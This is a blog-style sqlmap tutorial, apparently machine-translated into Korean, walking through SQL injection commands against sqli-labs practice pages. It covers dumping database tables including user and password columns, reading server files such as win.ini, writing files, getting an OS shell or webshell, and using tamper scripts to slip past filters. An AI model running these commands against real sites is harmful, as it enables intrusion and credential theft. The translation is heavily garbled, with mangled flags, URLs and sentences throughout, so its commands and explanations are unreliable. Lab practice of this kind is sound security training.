하는 SQLMaps 주입 기본 과정

다른 사람들은 요약을 첨부 : https://www.cnblogs.com/ichunqiu/p/5805108.html

기본 문을하는 SQLMaps :

파이썬 sqlmap.py -u " 에 http : // xxxxx는 / X ID = 1? " --dbs (或者--current- dB) 
파이썬 sqlmap.py -u " 에 http : // xxxxx는 / X ID = 1? " - D 데이터베이스 _ - 테이블 
파이썬 sqlmap.py -u " 에 http : // xxxxx는 / X ID = 1? " -D database_name은 -T 테이블 _ - 
파이썬 sqlmap.py -u " HTTP : // xxxxx는 / X ID = 1 " -D 데이터베이스 _ -T TABLE_NAME -C " ID, 사용자 패스워드 " --dumps

사용되는 매개 변수

- 주입 기술하는 SQLMaps가에
 - 기본적으로 선택 BATCH 자동으로 실행
 --current- 데시벨 현재 데이터베이스
 --current- 사용자 현재 데이터베이스 사용자 이름을
 - IS - DBA는 현재 사용자에게 관리자 권한이 있는지 여부를 확인하기
 - 데이터 형식 POST 데이터 후 분사
 - 최대 동시 스레드 (10를 초과하지 않음) 스레드
 - .txt 인과 헤더 파일 R HTTP 요청 헤더 
쿠키 주입 --cookie
- 레벨 검출 단계, (3) 최적의 가장 광범위한 5 --sql-을 쉘은 사용자 정의 SQL 문장을 실행 --os- 운영 체제 명령을 실행하는 쉘을 --file- 데이터베이스에서 파일을 읽을 수있는 읽기 --file-쓰기 " 기본 경로 " --file-이명 령 " 서버 경로가 " 파일을 업로드 할 수 --tamper 스크립트는 우회와 함께 제공

0x01로 --technique 매개 변수

-Technique는 , 주입 기술하는 SQLMaps되는지지하는 SQLMaps 다른 분사 모드 5

B : 부울-based- 블라인드 (부울 블라인드) 
E : 오류 - 기반 (오류 유형 임플란트) 
U 상 : 연합 쿼리 - 기반 (결합 주입) 
S : 파일 시스템, 운영 체제, 레지스트리를 읽어 Starked 쿼리 (하는 SQLMaps 당신은 다중 문 쿼리 주입) 할 수있는이 매개 변수를 사용해야합니다 
T : 시간이 블라인드 기반 (시간 지연 주입 기준)

예를하는 SQLMaps 문 :

파이썬 sqlmap.py -u " http://127.0.0.1/sqli-labs-master/Less-5/?id=1 " --technique E --dbs --batch

0x02의 --data 파라미터 파라미터 --threads

하지 (10)를 초과, 실행 속도를 빠르게하기 위해 스레드 - 게시물에 주입하면, POST 데이터 후 --data를 넣어

파이썬 sqlmap.py -u " http://127.0.0.1/sqli-labs-master/Less-11/?id=1 " --data " 끝나면 uname = 1 & passwd를 = 11 & 제출 = 제출 " 
- 기술 UES 
 --dbms mysql을 --dbs --threads 8

0x03으로 -r 매개 변수

내부 txt 파일의 HTTP 요청 패킷 콘텐츠, 쿠키두고, txt 파일 -r 경로를 주기적으로 업데이트, 그래서하는 SQLMaps 자동으로 실행, 관심을 여기에 요청 매개 변수의 SQL 인젝션의 가치를 유지하기 위해 뒷면에 표시 가능성이됩니다 수 없습니다 "*"기호

파이썬 sqlmap.py -r 1.TXT --dbs --threads 8 - 기술 BTES 
或者
파이썬 sqlmap.py -u " http://127.0.0.1/sqli-labs-master/Less-18/ " --user -agent = " 모질라 / 5.0 (윈도우 NT 10.0; WOW64; RV : 61.0) 게코 / 20100101 파이어 폭스 / 61.0 * " --level 4 --dbs --threads 10 --technique BEST

당신은 SQL 주입의 정확한 위치를 알고 있다면,이 방법은 직접 두 번째 주사를 사용할 수 있습니다

를 0x04의 --cookie 매개 변수

웹 기반의 응용 인증 쿠키는 쿠키를 지정할 수 POST 요청에 대한 쿠키가 주입 파라미터로서 사용
하는 SQLMaps -u " URL " --cookie = " ... " --level 3 --dbs

의 0x05 --os 쉘 매개 변수

이 매개 변수를 사용하여 데이터베이스 관리자 권한을 알고, 루트 디렉토리의 URL을 알고, 당신은 WEBSHELL 업로드하고 쉘을 반송 할 수 있습니다.

--is-DBA가 관리자 권한이 있는지 확인

0x06 일 --file-읽기 매개 변수

이 파일의 내용을 읽기 위해이 매개 변수를 사용할 수 있습니다, 디렉토리 파일은 사이트를 고정 디렉토리 파일 또는 내부 웹 서버를 알고 :

파이썬 sqlmap.py -u는 " http://127.0.0.1/?id=1는 " --file 읽기 " C : /windows/win.ini "

0x07 값은 --file-이명 령을 --file-쓰기 参数

"서버 루트 디렉토리 경로가"--file-이명 령 "기본 파일 경로를 업로드 할 선택"--file-쓰기 SQL 인젝션의 존재 사이트를 알고를하고이 매개 변수를 사용할 수 있습니다 사이트의 전제의 루트를 알고  

을 0x08 --tamper 매개 변수

특별한 매개 변수 --tamper 스크립트는 이러한하는 SQLMaps는 우회하는 스크립트의 숫자와 함께 제공

XXXX --tamper sqlmap.py 파이썬 " 모듈 이름 "

 

추천

출처www.cnblogs.com/-chenxs/p/11671299.html